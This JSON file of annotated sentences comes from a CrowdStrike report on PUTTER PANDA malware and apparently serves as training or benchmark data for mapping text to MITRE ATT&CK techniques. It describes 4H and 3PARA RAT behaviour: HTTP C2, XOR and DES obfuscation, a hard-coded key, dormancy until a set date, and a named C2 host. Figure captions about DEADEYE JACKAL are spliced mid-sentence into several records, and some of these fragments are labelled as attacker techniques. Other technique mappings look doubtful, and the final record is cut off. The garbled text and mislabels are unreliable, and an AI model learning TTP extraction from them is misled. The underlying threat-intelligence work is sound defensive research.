"crowdstrike-47_crowdstrike_report-p24-s136-86ba6b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 24, "sentence_id": 136, "context_before": "This unit’s suspected involvement in “space surveillance”17 and “intercept of satellite communications” fits with their observed targeting preferences for Western companies producing technologies in the space and imaging/remote sensing sectors.", "sentence_text": "The size and number of dishes present in the area is also consistent with these activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p25-s139-2ea38a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 25, "sentence_id": 139, "context_before": "Binary indicators\nObserved build times for the PUTTER PANDA tools described in this report range from 2007 to late 2013, indicating that the actors have conducted several campaigns against their objectives over a period of several years.", "sentence_text": "A build time analysis of all known samples is shown in Figure 1 below, relative to China time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p25-s140-feb355", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 25, "sentence_id": 140, "context_before": "A build time analysis of all known samples is shown in Figure 1 below, relative to China time.", "sentence_text": "Time Analysis of PUTTER PANDA Malware, Relative to China Time (UTC+8)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p25-s141-25a5d2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 25, "sentence_id": 141, "context_before": "Time Analysis of PUTTER PANDA Malware, Relative to China Time (UTC+8)", "sentence_text": "There is also some evidence that build times are manipulated by the adversary; for example, the sample with MD5 hash bc4e9dad71b844dd3233cfbbb96c1bd3 has a build time of 18 July 2013, but was supposedly first submitted to VirusTotal on 9 January 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p25-s142-99e94f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 25, "sentence_id": 142, "context_before": "There is also some evidence that build times are manipulated by the adversary; for example, the sample with MD5 hash bc4e9dad71b844dd3233cfbbb96c1bd3 has a build time of 18 July 2013, but was supposedly first submitted to VirusTotal on 9 January 2013.", "sentence_text": "This shows that the attackers – at least in 2013 – were aware of some operational security considerations and were likely taking deliberate steps to hide their origins.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p26-s143-195109", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 26, "sentence_id": 143, "context_before": "This shows that the attackers – at least in 2013 – were aware of some operational security considerations and were likely taking deliberate steps to hide their origins.", "sentence_text": "Another actor tied to this activity, the School of Information Security Engineering at SJTU.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p26-s144-ea0610", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 26, "sentence_id": 144, "context_before": "Another actor tied to this activity, the School of Information Security Engineering at SJTU.", "sentence_text": "This university has previously been posited as a recruiting ground for the PLA to find personnel for its cyber intelligence gathering units, and there is circumstantial evidence linked cpyy to other actors based at SJTU.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p26-s145-e4a95f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 26, "sentence_id": 145, "context_before": "This university has previously been posited as a recruiting ground for the PLA to find personnel for its cyber intelligence gathering units, and there is circumstantial evidence linked cpyy to other actors based at SJTU.", "sentence_text": "It is likely that this organization is staffed in part by current or former students of SJTU, and shares some resources and direction with PLA Unit 61398 (COMMENT PANDA).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s148-082160", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 148, "context_before": "Technical Analysis\nSeveral RATs are used by PUTTER PANDA.", "sentence_text": "This analysis will be revisited below, along with an examination of two other PUTTER PANDA tools:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s149-f16839", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 149, "context_before": "This analysis will be revisited below, along with an examination of two other PUTTER PANDA tools:\npngdowner and httpclient.", "sentence_text": "Two droppers have been associated with the PUTTER PANDA toolset; these are also briefly examined below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s150-d931d1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 150, "context_before": "Two droppers have been associated with the PUTTER PANDA toolset; these are also briefly examined below.", "sentence_text": "4H RAT – EXAMPLE MD5 HASH A76419A2FCA12427C887895E12A3442B", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s151-a2a549", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 151, "context_before": "4H RAT – EXAMPLE MD5 HASH A76419A2FCA12427C887895E12A3442B", "sentence_text": "This RAT was first analyzed by CrowdStrike in April 2012, but a historical analysis shows that it has been in use since at least 2007 by the PUTTER PANDA actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s152-3ccecd", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 152, "context_before": "This RAT was first analyzed by CrowdStrike in April 2012, but a historical analysis shows that it has been in use since at least 2007 by the PUTTER PANDA actors.", "sentence_text": "A listing of metadata for known samples, including C2 Screenshot of Truecaller information, is shown in Appendix 1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s153-113f46", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 153, "context_before": "A listing of metadata for known samples, including C2 Screenshot of Truecaller information, is shown in Appendix 1.", "sentence_text": "Database Shared by DEADEYE JACKAL on Their The operation of this RAT is described in detail in other CrowdStrike reporting, but isTwitterusefulAccountto revisit(nameshere to highlight the characteristics of the RAT: redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s155-f830e8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 155, "context_before": "•", "sentence_text": "• A series of HTTP requests characterizes the RAT’s C2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s156-d9157f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 156, "context_before": "• A series of HTTP requests characterizes the RAT’s C2.", "sentence_text": "The initial beacon uses a request with four parameters (h1, h2, h3, and h4) – as shown in Figure 8 – to register the implant with the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s158-c4f420", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 158, "context_before": "•", "sentence_text": "Communication to and from the C2 server is obfuscated using a 1-byte XOR with the key 0xBE.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscate communication to and from the C2 server using a 1-byte XOR key (0xBE).", "entities": [ { "text": "Communication to and from the C2 server is obfuscated using a 1-byte XOR with the key 0xBE", "start": 0, "end": 90, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p28-s159-da4fc9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 28, "sentence_id": 159, "context_before": "Communication to and from the C2 server is obfuscated using a 1-byte XOR with the key 0xBE.\n•", "sentence_text": "The commands supported by the RAT enable several capabilities, including:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s160-4681e5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 160, "context_before": "The commands supported by the RAT enable several capabilities, including:\no Remote shell o Listing of running processes (including loaded modules)\no Process termination (specified by PID)", "sentence_text": "Example Beacon", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s161-079aae", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 161, "context_before": "Example Beacon\nScreenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Python Code to redacted)\nDecode Hostname\nfrom User-Agent\nSnippet3PARA RAT – EXAMPLE MD5 HASH BC4E9DAD71B844DD3233CFBBB96C1BD3", "sentence_text": "The 3PARA RAT was described in some detail in other CrowdStrike reporting, which examined a DLL-based sample with an exported filename of ssdpsvc.dll.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s162-0685da", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 162, "context_before": "The 3PARA RAT was described in some detail in other CrowdStrike reporting, which examined a DLL-based sample with an exported filename of ssdpsvc.dll.", "sentence_text": "Other observed exported filenames are msacem.dll and mrpmsg.dll, although the RAT has also been observed in plain executable (EXE) format.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s163-f4bb1d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 163, "context_before": "Other observed exported filenames are msacem.dll and mrpmsg.dll, although the RAT has also been observed in plain executable (EXE) format.", "sentence_text": "On startup, the RAT attempts to create a file mapping named &*SDKJfhksdf89*DIUKJDSF&*sdfsdf78sdfsdf.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Create obfuscated file mapping on startup to support stealthy execution", "entities": [ { "text": "the RAT", "start": 12, "end": 19, "label": "MalwareTool" }, { "text": " attempts to create a file mapping named", "start": 19, "end": 59, "label": "Action" }, { "text": " &*SDKJfhksdf89*DIUKJDSF&*sdfsdf78sdfsdf", "start": 59, "end": 99, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s164-1727d6", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 164, "context_before": "On startup, the RAT attempts to create a file mapping named &*SDKJfhksdf89*DIUKJDSF&*sdfsdf78sdfsdf.", "sentence_text": "This is used to prevent multiple instances of the RAT being executed simultaneously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s165-69d55e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 165, "context_before": "This is used to prevent multiple instances of the RAT being executed simultaneously.", "sentence_text": "The RAT will then use a byte-wise subtraction- based algorithm (using a hard-coded modulo value) to decode C2 server details consisting of a server hostname and port number, in this example nsc.adomhn.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Decoding concealed C2 hostname/port via custom subtraction-modulo algorithm", "entities": [ { "text": "RAT", "start": 4, "end": 7, "label": "MalwareTool" }, { "text": "use a byte-wise subtraction- based algorithm (using a hard-coded modulo value) to decode", "start": 18, "end": 106, "label": "Action" }, { "text": "C2 server", "start": 107, "end": 116, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s166-858898", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 166, "context_before": "The RAT will then use a byte-wise subtraction- based algorithm (using a hard-coded modulo value) to decode C2 server details consisting of a server hostname and port number, in this example nsc.adomhn.\ncom, port 80.", "sentence_text": "The decoding algorithm is illustrated in Figure 10 below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s167-da52aa", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 167, "context_before": "The decoding algorithm is illustrated in Figure 10 below.", "sentence_text": "The key and modulo values vary on a per-sample basis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p29-s168-02922c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 29, "sentence_id": 168, "context_before": "The key and modulo values vary on a per-sample basis.", "sentence_text": "Decoded C2 settings, along with sample metadata, are listed in Appendix 2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s169-c55d81", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 169, "context_before": "Decoded C2 settings, along with sample metadata, are listed in Appendix 2.", "sentence_text": "Python Code Illus-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s170-511361", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 170, "context_before": "Python Code Illus-", "sentence_text": "trating C2 Server Decoding Routine", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s171-e42ab9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 171, "context_before": "trating C2 Server Decoding Routine", "sentence_text": "The RAT is programmed in C++ using Microsoft Visual Studio, and it makes use of the object-oriented and parallel programming features of this environment; Standard Template Library (STL) objects are used to represent data structures such as strings and lists, and custom objects are used to represent some of the C2 command handlers (e.g., CCommandCMD).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s172-c1d4a8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 172, "context_before": "The RAT is programmed in C++ using Microsoft Visual Studio, and it makes use of the object-oriented and parallel programming features of this environment; Standard Template Library (STL) objects are used to represent data structures such as strings and lists, and custom objects are used to represent some of the C2 command handlers (e.g., CCommandCMD).", "sentence_text": "Several threads are used to handle different stages of the C2 protocol, such as receiving data from the server, decrypting data, and processing commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s173-290bb2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 173, "context_before": "Several threads are used to handle different stages of the C2 protocol, such as receiving data from the server, decrypting data, and processing commands.", "sentence_text": "Standard Windows primitives such as Events are used to synchronize across these threads, with a shared global structure used to hold state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s174-1e5479", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 174, "context_before": "Standard Windows primitives such as Events are used to synchronize across these threads, with a shared global structure used to hold state.", "sentence_text": "Once running, the RAT will load a binary representation of a date/time value13 fromScreenshota of Truecaller file C:\\RECYCLER\\restore.dat, and it will sleep until after this date/time has passed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.003", "name": "Time Based Checks" } ], "procedure": "Use time-delayed execution by loading activation timestamp from hidden file", "entities": [ { "text": "the RAT", "start": 14, "end": 21, "label": "MalwareTool" }, { "text": "will load a binary representation of a date/time value13 fromScreenshota of Truecaller file", "start": 22, "end": 113, "label": "Action" }, { "text": "will sleep until after this date/time has passed.", "start": 146, "end": 195, "label": "Action" }, { "text": "C:\\RECYCLER\\restore.dat", "start": 114, "end": 137, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s175-5b39bc", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 175, "context_before": "Once running, the RAT will load a binary representation of a date/time value13 fromScreenshota of Truecaller file C:\\RECYCLER\\restore.dat, and it will sleep until after this date/time has passed.", "sentence_text": "DatabaseThis Shared by provides a mechanism for the operators to allow the RAT to remain dormant until aDEADEYE JACKAL on Their fixed time, perhaps to allow a means of regaining access if other parts of their toolsetTwitter Account (names are removed from a victim system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "RAT remains dormant until a scheduled activation time to regain system access.", "entities": [ { "text": "DEADEYE JACKAL", "start": 104, "end": 118, "label": "ThreatActor" }, { "text": "RAT", "start": 75, "end": 78, "label": "MalwareTool" }, { "text": "to remain dormant", "start": 79, "end": 96, "label": "Action" }, { "text": "to allow a means of regaining access ", "start": 148, "end": 185, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s178-3350b9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 178, "context_before": "RAT Initial Beacon", "sentence_text": "As with the 4H RAT, the C2 protocol used by the 3PARA RAT is HTTP based, using both GET and POST requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "C2 protocol uses HTTP GET and POST requests for communication.", "entities": [ { "text": "4H RAT", "start": 12, "end": 18, "label": "MalwareTool" }, { "text": "3PARA RAT", "start": 48, "end": 57, "label": "MalwareTool" }, { "text": " used", "start": 35, "end": 40, "label": "Action" }, { "text": "using both GET and POST requests", "start": 73, "end": 105, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s179-e96086", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 179, "context_before": "As with the 4H RAT, the C2 protocol used by the 3PARA RAT is HTTP based, using both GET and POST requests.", "sentence_text": "An initial request is made to the C2 server (illustrated in Figure 11 above), but the response value is effectively ignored; it is likely that this request serves only as a connectivity check, as further C2 activity will only occur if this first request is successful.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Initial HTTP request checks connectivity with the C2 server before further C2 activity.", "entities": [ { "text": "C2 server", "start": 34, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "An initial request is made ", "start": 0, "end": 27, "label": "Action" }, { "text": "connectivity check", "start": 173, "end": 191, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s180-d205f6", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 180, "context_before": "An initial request is made to the C2 server (illustrated in Figure 11 above), but the response value is effectively ignored; it is likely that this request serves only as a connectivity check, as further C2 activity will only occur if this first request is successful.", "sentence_text": "In this case, the RAT will transmit some basic victim information to the C2 server along with a 256-byte hash of the hard-coded string HYF54&%9&jkMCXuiS.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "RAT exfiltrates basic victim information and a 256-byte hashed string to the C2 server.", "entities": [ { "text": " RAT", "start": 17, "end": 21, "label": "MalwareTool" }, { "text": "will transmit some basic victim information", "start": 22, "end": 65, "label": "Action" }, { "text": "C2 server", "start": 73, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "HYF54&%9&jkMCXuiS", "start": 135, "end": 152, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s181-1950af", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 181, "context_before": "In this case, the RAT will transmit some basic victim information to the C2 server along with a 256-byte hash of the hard-coded string HYF54&%9&jkMCXuiS.", "sentence_text": "It is likely that this request functions as a means to authenticate the RAT to the C2 server and register a new victim machine with the controller.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "RAT authenticates to the C2 server and registers the victim machine.", "entities": [ { "text": "RAT", "start": 72, "end": 75, "label": "MalwareTool" }, { "text": "C2 server", "start": 83, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "to authenticate the RAT to the C2 server and register a new victim machine", "start": 52, "end": 126, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s182-69632e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 182, "context_before": "It is likely that this request functions as a means to authenticate the RAT to the C2 server and register a new victim machine with the controller.", "sentence_text": "A sample request and its structure are shown in Figure 12.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p30-s183-00e3d4", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 30, "sentence_id": 183, "context_before": "A sample request and its structure are shown in Figure 12.", "sentence_text": "13Using the standard Windows SYSTEMTIME structure", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p31-s184-82226d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 31, "sentence_id": 184, "context_before": "13Using the standard Windows SYSTEMTIME structure", "sentence_text": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "DEADEYE JACKAL shared a screenshot of a Truecaller database on their Twitter account.", "entities": [ { "text": "DEADEYE JACKAL", "start": 44, "end": 58, "label": "ThreatActor" }, { "text": "Truecaller Database", "start": 14, "end": 33, "label": "Infrastructure_Indicator" }, { "text": " Twitter Account", "start": 67, "end": 83, "label": "Infrastructure_Indicator" }, { "text": " Shared", "start": 33, "end": 40, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p31-s185-01b579", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 31, "sentence_id": 185, "context_before": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "3PARA RAT Second- ary Beacon/ C2 Registration 14See http://msdn.microsoft.com/en-us/library/windows/desktop/bb759853(v=vs.85).aspx for details of this API, which is rarely used.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "3PARA RAT performs a secondary beacon to the C2 server for registration.", "entities": [ { "text": "3PARA RAT", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "Second- ary Beacon", "start": 10, "end": 28, "label": "Action" }, { "text": "C2 Registration", "start": 30, "end": 45, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p32-s186-063358", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 32, "sentence_id": 186, "context_before": "3PARA RAT Second- ary Beacon/ C2 Registration 14See http://msdn.microsoft.com/en-us/library/windows/desktop/bb759853(v=vs.85).aspx for details of this API, which is rarely used.", "sentence_text": "Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "DEADEYE JACKAL shared a database on their Twitter account", "entities": [ { "text": "DEADEYE JACKAL", "start": 19, "end": 33, "label": "ThreatActor" }, { "text": "Database", "start": 0, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "Shared", "start": 9, "end": 15, "label": "Action" }, { "text": "Twitter Account", "start": 43, "end": 58, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s187-d029aa", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 187, "context_before": "Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)\nRAT Sample Tasking Request", "sentence_text": "Returned tasking is decrypted using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&%9&jkMCXuiS (as used in the secondary beacon shown above).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Returned C2 tasking is decrypted using DES in CBC mode with a key derived from an MD5 hash of a hard-coded string.", "entities": [ { "text": "is decrypted using ", "start": 17, "end": 36, "label": "Action" }, { "text": "Returned tasking", "start": 0, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "a key derived from ", "start": 71, "end": 90, "label": "Action" }, { "text": "HYF54&%9&jkMCXuiS ", "start": 117, "end": 135, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s188-738d8e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 188, "context_before": "Returned tasking is decrypted using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&%9&jkMCXuiS (as used in the secondary beacon shown above).", "sentence_text": "If this fails, the RAT will fall back to decoding the data using an 8-byte XOR with a key derived from data returned from the HashData API with the same key string.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "RAT uses XOR-based decryption as a fallback when DES decryption fails.", "entities": [ { "text": "RAT", "start": 19, "end": 22, "label": "MalwareTool" }, { "text": "will fall back to decoding the data using an 8-byte XOR with a key derived from data returned from ", "start": 23, "end": 122, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s189-70ea18", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 189, "context_before": "If this fails, the RAT will fall back to decoding the data using an 8-byte XOR with a key derived from data returned from the HashData API with the same key string.", "sentence_text": "Output data produced by tasking instructions is encrypted in the same manner as it was decrypted and sent back to the C2 server via HTTP POST request to a URI of the form /microsoft/errorpost/ default.aspx?ID=, where the ID value is a random number in decimal representation – as with the initial request shown in Figure 4.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Output from task instructions is encrypted and sent back to the C2 server using HTTP POST with a randomized ID parameter.", "entities": [ { "text": "is encrypted in the same manner as it was decrypted and sent back to", "start": 45, "end": 113, "label": "Action" }, { "text": "C2 server", "start": 118, "end": 127, "label": "Infrastructure_Indicator" }, { "text": " /microsoft/errorpost/ default.aspx?ID=", "start": 170, "end": 209, "label": "Infrastructure_Indicator" }, { "text": "request to a URI of the form", "start": 142, "end": 170, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s190-443081", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 190, "context_before": "Output data produced by tasking instructions is encrypted in the same manner as it was decrypted and sent back to the C2 server via HTTP POST request to a URI of the form /microsoft/errorpost/ default.aspx?ID=, where the ID value is a random number in decimal representation – as with the initial request shown in Figure 4.", "sentence_text": "The set of commands supported by the RAT is somewhat limited, indicating that perhaps the RAT is intended to be used as a second-stage tool, or as a failsafe means for the attackers to regain basic access to a compromised system (which is consistent with its support for sleeping until a certain date/time).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "RAT provides a limited command set for fallback access as a second-stage tool, sleeping until activation to regain control.", "entities": [ { "text": "RAT", "start": 37, "end": 40, "label": "MalwareTool" }, { "text": " to be used as a second-stage tool, or as a failsafe means for the attackers to regain basic access to a compromised system", "start": 105, "end": 228, "label": "Action" }, { "text": " compromised system", "start": 209, "end": 228, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s191-e91d92", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 191, "context_before": "The set of commands supported by the RAT is somewhat limited, indicating that perhaps the RAT is intended to be used as a second-stage tool, or as a failsafe means for the attackers to regain basic access to a compromised system (which is consistent with its support for sleeping until a certain date/time).", "sentence_text": "Some of the supported commands are implemented using C++ classes derived from a base CCommand class:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s192-073c99", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 192, "context_before": "Some of the supported commands are implemented using C++ classes derived from a base CCommand class:\n• CCommandAttribe – Retrieve metadata for files on disk, or set certain attributes such as creation/ modification timestamps.", "sentence_text": "• CCommandCD – Change the working directory for the current C2 session.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s193-a98854", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 193, "context_before": "• CCommandCD – Change the working directory for the current C2 session.", "sentence_text": "• CCommandCMD – Execute a command, with standard input/output/error Screenshot of Truecaller redirected over the C2 channel.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ 